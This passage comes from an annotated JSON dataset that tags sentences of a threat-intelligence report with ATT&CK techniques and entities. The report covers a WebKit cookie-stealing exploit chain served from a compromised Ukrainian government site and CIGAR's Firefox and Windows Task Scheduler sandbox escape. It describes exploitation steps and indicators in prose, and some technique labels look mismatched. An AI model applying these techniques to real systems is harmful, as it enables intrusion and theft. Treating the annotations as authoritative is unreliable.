"T1071.001", "name": "Web Protocols" } ], "procedure": "Load malicious JavaScript from the compromised Diplomatic Academy of Ukraine website.", "entities": [ { "text": "online.da.mfa.gov.ua", "start": 107, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "JavaScript", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": " loaded", "start": 18, "end": 25, "label": "Action" }, { "text": "website", "start": 61, "end": 68, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s102-1041a6", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "The JavaScript was loaded directly from the main page of the website of the Diplomatic Academy of Ukraine, online.da.mfa.gov.ua.", "sentence_text": "Upon further analysis, we discovered that the JavaScript code was a WebKit exploit chain specifically targeting MacOS users running on Intel hardware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Use a WebKit exploit chain to target macOS users on Intel hardware", "entities": [ { "text": "JavaScript code", "start": 46, "end": 61, "label": "MalwareTool" }, { "text": "WebKit exploit chain", "start": 68, "end": 88, "label": "MalwareTool" }, { "text": "targeting ", "start": 102, "end": 112, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s103-ef63b9", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "Upon further analysis, we discovered that the JavaScript code was a WebKit exploit chain specifically targeting MacOS users running on Intel hardware.", "sentence_text": "The exploit consisted of a WebKit remote code execution (RCE) vulnerability (CVE-2024-44308), leveraging a logical Just-In-Time (JIT) error, succeeded by a data isolation bypass (CVE-2024-44309).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Exploit chain leveraged WebKit RCE vulnerability CVE-2024-44308 and a data isolation bypass CVE-2024-44309.", "entities": [ { "text": "leveraging a logical Just-In-Time (JIT) error, succeeded by a data isolation bypass", "start": 94, "end": 177, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s104-b9933d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "The exploit consisted of a WebKit remote code execution (RCE) vulnerability (CVE-2024-44308), leveraging a logical Just-In-Time (JIT) error, succeeded by a data isolation bypass (CVE-2024-44309).", "sentence_text": "The RCE vulnerability employed simple and old JavaScriptCore exploitation techniques that are publicly documented , namely:\nSetting up addrof/fakeobj primitives using the vulnerability Leaking StructureID", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Use addrof/fakeobj primitives and leak StructureID to exploit JavaScriptCore", "entities": [ { "text": "employed simple and old JavaScriptCore exploitation techniques", "start": 22, "end": 84, "label": "Action" }, { "text": "Setting up addrof/fakeobj", "start": 124, "end": 149, "label": "Action" }, { "text": "using the vulnerability Leaking StructureID", "start": 161, "end": 204, "label": "Action" }, { "text": " JavaScriptCore exploitation techniques", "start": 45, "end": 84, "label": "MalwareTool" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s105-912d20", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "The RCE vulnerability employed simple and old JavaScriptCore exploitation techniques that are publicly documented , namely:\nSetting up addrof/fakeobj primitives using the vulnerability Leaking StructureID", "sentence_text": "Building a fake TypedArray to gain arbitrary read/write JIT compiling a function to get a RWX memory mapping where a shellcode can be written and executed The shellcode traversed a set of pointers and vtables to find and call WebCookieJar::cookieRequestHeaderFieldValue with an empty firstPartyForCookies parameter, allowing the threat actor to access cookies of any arbitrary website passed as the third parameter to cookieRequestHeaderFieldValue The end goal of the exploit is to collect users' cookies in order to access login.microsoftonline.com.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Build fake TypedArray for memory manipulation, JIT compile function for RWX memory, execute shellcode to call WebCookieJar API and steal cookies", "entities": [ { "text": "gain arbitrary read/write JIT compiling a function", "start": 30, "end": 80, "label": "Infrastructure_Indicator" }, { "text": "get a RWX memory mapping", "start": 84, "end": 108, "label": "MalwareTool" }, { "text": " access", "start": 516, "end": 523, "label": "MalwareTool" }, { "text": " login.microsoftonline.com.", "start": 523, "end": 550, "label": "Infrastructure_Indicator" }, { "text": "Building a fake TypedArray ", "start": 0, "end": 27, "label": "MalwareTool" }, { "text": "shellcode", "start": 159, "end": 168, "label": "MalwareTool" }, { "text": "shellcode", "start": 117, "end": 126, "label": "MalwareTool" }, { "text": "collect users' cookies ", "start": 482, "end": 505, "label": "Action" }, { "text": " written ", "start": 133, "end": 142, "label": "Action" }, { "text": "executed", "start": 146, "end": 154, "label": "Action" }, { "text": " threat actor", "start": 328, "end": 341, "label": "ThreatActor" }, { "text": "access cookies", "start": 345, "end": 359, "label": "Action" }, { "text": "website", "start": 377, "end": 384, "label": "Infrastructure_Indicator" }, { "text": "find and call WebCookieJar::cookieRequestHeaderFieldValue", "start": 212, "end": 269, "label": "Action" }, { "text": " fake TypedArray", "start": 10, "end": 26, "label": "MalwareTool" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s106-203b12", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "Building a fake TypedArray to gain arbitrary read/write JIT compiling a function to get a RWX memory mapping where a shellcode can be written and executed The shellcode traversed a set of pointers and vtables to find and call WebCookieJar::cookieRequestHeaderFieldValue with an empty firstPartyForCookies parameter, allowing the threat actor to access cookies of any arbitrary website passed as the third parameter to cookieRequestHeaderFieldValue The end goal of the exploit is to collect users' cookies in order to access login.microsoftonline.com.", "sentence_text": "The cookie values were directly appended in a GET request sent to https://online.da.mfa.gov.ua/gotcookie?.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrate stolen cookie values via a GET request to a compromised server", "entities": [ { "text": "https://online.da.mfa.gov.ua/gotcookie?", "start": 66, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "appended", "start": 32, "end": 40, "label": "Action" }, { "text": "sent", "start": 58, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s107-ecf9f3", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "The cookie values were directly appended in a GET request sent to https://online.da.mfa.gov.ua/gotcookie?.", "sentence_text": "This is not the first time we have seen threat actors stay within the browser to collect users' credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Stay within the browser to collect user credentials", "entities": [ { "text": "threat actors", "start": 40, "end": 53, "label": "ThreatActor" }, { "text": "stay within the browser ", "start": 54, "end": 78, "label": "Action" }, { "text": "collect users' credentials", "start": 81, "end": 107, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s108-679838", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "This is not the first time we have seen threat actors stay within the browser to collect users' credentials.", "sentence_text": "In March 2021, a targeted campaign used a zero-day against WebKit on iOS to turn off Same-Origin-Policy protections in order to collect authentication cookies from several popular websites.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Use a WebKit zero-day to disable Same-Origin Policy and collect authentication cookies", "entities": [ { "text": " targeted ", "start": 16, "end": 26, "label": "Action" }, { "text": " used a zero-day ", "start": 34, "end": 51, "label": "Action" }, { "text": "collect authentication cookies", "start": 128, "end": 158, "label": "Action" }, { "text": " WebKit ", "start": 58, "end": 66, "label": "Infrastructure_Indicator" }, { "text": " iOS ", "start": 68, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "popular websites", "start": 172, "end": 188, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s109-9a68dc", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "In March 2021, a targeted campaign used a zero-day against WebKit on iOS to turn off Same-Origin-Policy protections in order to collect authentication cookies from several popular websites.", "sentence_text": "In August 2024, a watering hole on various Mongolian websites used Chrome and Safari n-day exploits to exfiltrate users’ credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1539", "name": "Steal Web Session Cookie" } ], "procedure": "Conduct a watering hole attack using Chrome/Safari n-day exploits to exfiltrate credentials", "entities": [ { "text": "exfiltrate users’ credentials", "start": 103, "end": 132, "label": "Action" }, { "text": " Chrome and Safari", "start": 66, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "used Chrome and Safari n-day exploits", "start": 62, "end": 99, "label": "Action" }, { "text": " watering hole ", "start": 17, "end": 32, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s110-3dc964", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "In August 2024, a watering hole on various Mongolian websites used Chrome and Safari n-day exploits to exfiltrate users’ credentials.", "sentence_text": "While it is unclear why this abbreviated approach was taken as opposed to deploying full-chain exploits, we identified several possibilities, including:\nThe threat actor was not able to get all the pieces to have a full chain exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s111-1223dd", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "While it is unclear why this abbreviated approach was taken as opposed to deploying full-chain exploits, we identified several possibilities, including:\nThe threat actor was not able to get all the pieces to have a full chain exploit.", "sentence_text": "In this case, the exploit likely targeted only the MacIntel platform because they did not have a Pointer Authentication Code (PAC) bypass to target users using Apple Silicon devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1622", "name": "Debugger Evasion" } ], "procedure": "target MacIntel platform without PAC bypass for Apple Silicon devices", "entities": [ { "text": "MacIntel platform ", "start": 51, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "Pointer Authentication Code (PAC) bypass", "start": 97, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "target ", "start": 141, "end": 148, "label": "Action" }, { "text": "Apple Silicon devices", "start": 160, "end": 181, "label": "Infrastructure_Indicator" }, { "text": " targeted ", "start": 32, "end": 42, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s112-e74a91", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "In this case, the exploit likely targeted only the MacIntel platform because they did not have a Pointer Authentication Code (PAC) bypass to target users using Apple Silicon devices.", "sentence_text": "A PAC bypass is required to make arbitrary calls for their data isolation bypass.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s113-cf9898", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "A PAC bypass is required to make arbitrary calls for their data isolation bypass.", "sentence_text": "The price for a full chain exploit was too expensive, especially when the chain is meant to be used at a relatively large scale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s114-bfaf7b", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "The price for a full chain exploit was too expensive, especially when the chain is meant to be used at a relatively large scale.", "sentence_text": "This especially includes watering hole attacks, where the chances of being detected are high and subsequently might quickly burn the zero-day vulnerability and exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s115-d6a263", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "This especially includes watering hole attacks, where the chances of being detected are high and subsequently might quickly burn the zero-day vulnerability and exploit.", "sentence_text": "Stealing credentials is sufficient for their operations and the information they want to collect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s116-26f085", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "Stealing credentials is sufficient for their operations and the information they want to collect.", "sentence_text": "Spotlight #2: CIGAR Local Privilege Escalations CIGAR's Browser Exploit Chain", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s117-bd223e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "Spotlight #2: CIGAR Local Privilege Escalations CIGAR's Browser Exploit Chain", "sentence_text": "In early October 2024, GTIG independently discovered a fully weaponized exploit chain for Firefox and Tor browsers employed by CIGAR.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "exploit attacks", "entities": [ { "text": " CIGAR", "start": 126, "end": 132, "label": "ThreatActor" }, { "text": "Firefox", "start": 90, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "Tor browsers", "start": 102, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "weaponized exploit chain", "start": 61, "end": 85, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s118-19772d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "In early October 2024, GTIG independently discovered a fully weaponized exploit chain for Firefox and Tor browsers employed by CIGAR.", "sentence_text": "CIGAR is a dual financial- and espionage-motivated threat group assessed to be running both types of campaigns in parallel, often simultaneously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s119-e054ab", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "CIGAR is a dual financial- and espionage-motivated threat group assessed to be running both types of campaigns in parallel, often simultaneously.", "sentence_text": "In 2023, we observed CIGAR utilizing an exploit chain in Microsoft Office ( CVE-2023-36884 ) as part of an espionage campaign targeting attendees of the Ukrainian World Congress and NATO Summit; however, in an October 2024 campaign, the usage of the Firefox exploit appears to be more in line with the group's financial motives.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "utilized an exploit chain in Microsoft Office (CVE-2023-36884) for an espionage campaign and a Firefox exploit for a financial campaign", "entities": [ { "text": "CIGAR ", "start": 21, "end": 27, "label": "ThreatActor" }, { "text": "Microsoft Office", "start": 57, "end": 73, "label": "Infrastructure_Indicator" }, { "text": " CVE-2023-36884", "start": 75, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "targeting", "start": 126, "end": 135, "label": "Action" }, { "text": " Firefox exploit", "start": 249, "end": 265, "label": "MalwareTool" }, { "text": "utilizing an exploit chain ", "start": 27, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s120-6c6bfc", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "In 2023, we observed CIGAR utilizing an exploit chain in Microsoft Office ( CVE-2023-36884 ) as part of an espionage campaign targeting attendees of the Ukrainian World Congress and NATO Summit; however, in an October 2024 campaign, the usage of the Firefox exploit appears to be more in line with the group's financial motives.", "sentence_text": "The vulnerability, known as CVE-2024-9680 , was an n-day at the time of discovery by GTIG.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s121-a1c0fe", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "The vulnerability, known as CVE-2024-9680 , was an n-day at the time of discovery by GTIG.", "sentence_text": "Upon further analysis, we identified that the embedded sandbox escape, which was also used as a local privilege escalation to NT/SYSTEM, was exploiting a newfound vulnerability.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "The sandbox escape was used as a local privilege escalation to NT/SYSTEM by exploiting a newfound vulnerability", "entities": [ { "text": "sandbox escape", "start": 55, "end": 69, "label": "MalwareTool" }, { "text": "exploiting", "start": 141, "end": 151, "label": "Action" }, { "text": "NT/SYSTEM", "start": 126, "end": 135, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s122-bc933c", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "Upon further analysis, we identified that the embedded sandbox escape, which was also used as a local privilege escalation to NT/SYSTEM, was exploiting a newfound vulnerability.", "sentence_text": "We reported this vulnerability to Mozilla and Microsoft, and it was later assigned CVE-2024-49039 Double-Down on Privilege Escalation: from Low Integrity to SYSTEM Firefox uses security sandboxing to introduce an additional security boundary and mitigate the effects of malicious code achieving code execution in content processes.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Firefox uses security sandboxing to introduce an additional security boundary", "entities": [ { "text": " CVE-2024-49039 ", "start": 82, "end": 98, "label": "Infrastructure_Indicator" }, { "text": " SYSTEM Firefox", "start": 156, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "security sandboxing", "start": 177, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "malicious code ", "start": 270, "end": 285, "label": "MalwareTool" }, { "text": "Privilege Escalation", "start": 113, "end": 133, "label": "Action" }, { "text": "code execution", "start": 295, "end": 309, "label": "Action" }, { "text": "Mozilla", "start": 34, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "Microsoft", "start": 46, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s123-43830a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "We reported this vulnerability to Mozilla and Microsoft, and it was later assigned CVE-2024-49039 Double-Down on Privilege Escalation: from Low Integrity to SYSTEM Firefox uses security sandboxing to introduce an additional security boundary and mitigate the effects of malicious code achieving code execution in content processes.", "sentence_text": "The in-the-wild CVE-2024-49039 exploit, which contained the PDB string C:\\etalon\\PocLowIL\\@Output\\PocLowIL.pdb , could achieve both a sandbox escape and privilege escalation.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploiting CVE-2024-49039 to escape a sandbox and escalate privileges", "entities": [ { "text": "C:\\etalon\\PocLowIL\\@Output\\PocLowIL.pdb", "start": 71, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "achieve", "start": 119, "end": 126, "label": "Action" }, { "text": "sandbox escape", "start": 134, "end": 148, "label": "Action" }, { "text": " privilege escalation", "start": 152, "end": 173, "label": "Action" }, { "text": " CVE-2024-49039 exploit", "start": 15, "end": 38, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s124-8bca08", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "The in-the-wild CVE-2024-49039 exploit, which contained the PDB string C:\\etalon\\PocLowIL\\@Output\\PocLowIL.pdb , could achieve both a sandbox escape and privilege escalation.", "sentence_text": "The exploit abused two distinct issues to escalate privileges from Low Integrity Level (IL) to SYSTEM: the first allowed it to access the WPTaskScheduler RPC Interface (UUID:\n{33d84484-3626-47ee-8c6f-e7e98b113be1}\n), normally not accessible from a sandbox Firefox content process via the \"less-secure endpoint\" ubpmtaskhostchannel created in ubpm.dll; the second stems from insufficient Access Control List (ACL) checks in WPTaskScheduler.dll RPC server, which allowed an unprivileged user to create and execute scheduled tasks as SYSTEM.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Abusing WPTaskScheduler RPC interface and weak ACLs to escalate privileges from Low IL to SYSTEM", "entities": [ { "text": " exploit ", "start": 3, "end": 12, "label": "MalwareTool" }, { "text": "abused", "start": 12, "end": 18, "label": "Action" }, { "text": "escalate privileges ", "start": 42, "end": 62, "label": "Action" }, { "text": "ow Integrity Level (IL) to SYSTEM", "start": 68, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "access", "start": 127, "end": 133, "label": "Action" }, { "text": "WPTaskScheduler RPC Interface (UUID:\n{33d84484-3626-47ee-8c6f-e7e98b113be1}", "start": 138, "end": 213, "label": "Infrastructure_Indicator" }, { "text": "sandbox Firefox", "start": 248, "end": 263, "label": "Infrastructure_Indicator" }, { "text": "ubpmtaskhostchannel", "start": 311, "end": 330, "label": "Infrastructure_Indicator" }, { "text": "ubpm.dll", "start": 342, "end": 350, "label": "Infrastructure_Indicator" }, { "text": "WPTaskScheduler.dll RPC server", "start": 423, "end": 453, "label": "Infrastructure_Indicator" }, { "text": "create", "start": 493, "end": 499, "label": "Action" }, { "text": " execute", "start": 503, "end": 511, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s125-1a2654", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "The exploit abused two distinct issues to escalate privileges from Low Integrity Level (IL) to SYSTEM: the first allowed it to access the WPTaskScheduler RPC Interface (UUID:\n{33d84484-3626-47ee-8c6f-e7e98b113be1}\n), normally not accessible from a sandbox Firefox content process via the \"less-secure endpoint\" ubpmtaskhostchannel created in ubpm.dll; the second stems from insufficient Access Control List (ACL) checks in WPTaskScheduler.dll RPC server, which allowed an unprivileged user to create and execute scheduled tasks as SYSTEM.", "sentence_text": "Securing the endpoint:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s126-5e7850", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "Securing the endpoint:", "sentence_text": "In\nWPTaskScheduler::TsiRegisterRPCInterface,\nthe third argument to RpcServerUseProtseq is a non-NULL security descriptor (SD).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s127-235b6d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "In\nWPTaskScheduler::TsiRegisterRPCInterface,\nthe third argument to RpcServerUseProtseq is a non-NULL security descriptor (SD).", "sentence_text": "This SD should prevent the Firefox \"Content\" process from accessing the WPTaskScheduler RPC endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s128-e1628e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "This SD should prevent the Firefox \"Content\" process from accessing the WPTaskScheduler RPC endpoint.", "sentence_text": "This is what the exploit does: instead of accessing RPC using the ALPC port that the WPTaskScheduler.dll sets up, it resolves the interface indirectly via upbmtaskhostchannel .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Resolving the RPC interface indirectly via upbmtaskhostchannel to bypass the ALPC port security", "entities": [ { "text": "exploit", "start": 17, "end": 24, "label": "MalwareTool" }, { "text": "WPTaskScheduler.dll ", "start": 85, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "upbmtaskhostchannel", "start": 155, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "accessing", "start": 42, "end": 51, "label": "Action" }, { "text": "resolves", "start": 117, "end": 125, "label": "Action" }, { "text": " ALPC port ", "start": 65, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s129-53e45f", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "This is what the exploit does: instead of accessing RPC using the ALPC port that the WPTaskScheduler.dll sets up, it resolves the interface indirectly via upbmtaskhostchannel .", "sentence_text": "ubpm.dll uses a NULL security descriptor when initializing the interface, instead relying on the UbpmpTaskHostChannelInterfaceSecurityCb callback for ACL checks:\n2.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s130-e2a836", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "ubpm.dll uses a NULL security descriptor when initializing the interface, instead relying on the UbpmpTaskHostChannelInterfaceSecurityCb callback for ACL checks:\n2.", "sentence_text": "Securing the interface:\nIn the same WPTaskScheduler::TsiRegisterRPCInterface function, an overly permissive security descriptor was used as an argument to RpcServerRegisterIf3 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s131-7602af", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "Securing the interface:\nIn the same WPTaskScheduler::TsiRegisterRPCInterface function, an overly permissive security descriptor was used as an argument to RpcServerRegisterIf3 .", "sentence_text": "As we can see on the listing below, the CVE-2024-49039 patch addressed this by introducing a more locked-down SD.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s132-741d3c", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "As we can see on the listing below, the CVE-2024-49039 patch addressed this by introducing a more locked-down SD.", "sentence_text": "Ad-hoc Security:\nImplemented in\nWPTaskScheduler.dll::CallerHasAccess\nand called prior to enabling or executing any scheduled task.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s133-53694d", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Ad-hoc Security:\nImplemented in\nWPTaskScheduler.dll::CallerHasAccess\nand called prior to enabling or executing any scheduled task.", "sentence_text": "The function performs checks on whether the calling user is attempting to execute a task created by them or one they should be able to access but does not perform any additional checks to prevent calls originating from an unprivileged user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s134-a35f87", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "The function performs checks on whether the calling user is attempting to execute a task created by them or one they should be able to access but does not perform any additional checks to prevent calls originating from an unprivileged user.", "sentence_text": "CVE-2024-49039 addresses the issue by applying a more restrictive ACL to the interface; however, the issue with the less secure endpoint described in \"1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s135-696249", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "CVE-2024-49039 addresses the issue by applying a more restrictive ACL to the interface; however, the issue with the less secure endpoint described in \"1.", "sentence_text": "Securing the endpoint\" remains, and a restricted token process is still able to access the endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s136-675c9e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "Securing the endpoint\" remains, and a restricted token process is still able to access the endpoint.", "sentence_text": "Unidentified Actor Using the Same Exploits", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Unidentified Actor is using the same exploits", "entities": [ { "text": "Unidentified Actor", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "Using", "start": 19, "end": 24, "label": "Action" }, { "text": "Exploits", "start": 34, "end": 42, "label": "MalwareTool" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s137-28f41a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "Unidentified Actor Using the Same Exploits", "sentence_text": "In addition to CIGAR, we discovered another, likely financially motivated, group using the exact same exploits (albeit with a different payload) while CVE-2024-49039 was still a zero-day.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "A financially motivated group used the exact same exploits (with a different payload) while CVE-2024-49039 was still a zero-day", "entities": [ { "text": "CIGAR", "start": 15, "end": 20, "label": "ThreatActor" }, { "text": "financially motivated, group", "start": 52, "end": 80, "label": "ThreatActor" }, { "text": "using", "start": 81, "end": 86, "label": "Action" }, { "text": "exploits", "start": 102, "end": 110, "label": "MalwareTool" }, { "text": "CVE-2024-49039", "start": 151, "end": 165, "label": "Infrastructure_Indicator" }, { "text": " zero-day", "start": 177, "end": 186, "label": "Infrastructure_Indicator" }, { "text": " payload", "start": 135, "end": 143, "label": "MalwareTool" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s138-699fce", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "In addition to CIGAR, we discovered another, likely financially motivated, group using the exact same exploits (albeit with a different payload) while CVE-2024-49039 was still a zero-day.", "sentence_text": "This actor utilized a watering hole on a legitimate, compromised cryptocurrency news website redirecting to an attacker-controlled domain hosting the same CVE-2024-9680 and CVE-2024-49039 exploit.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": 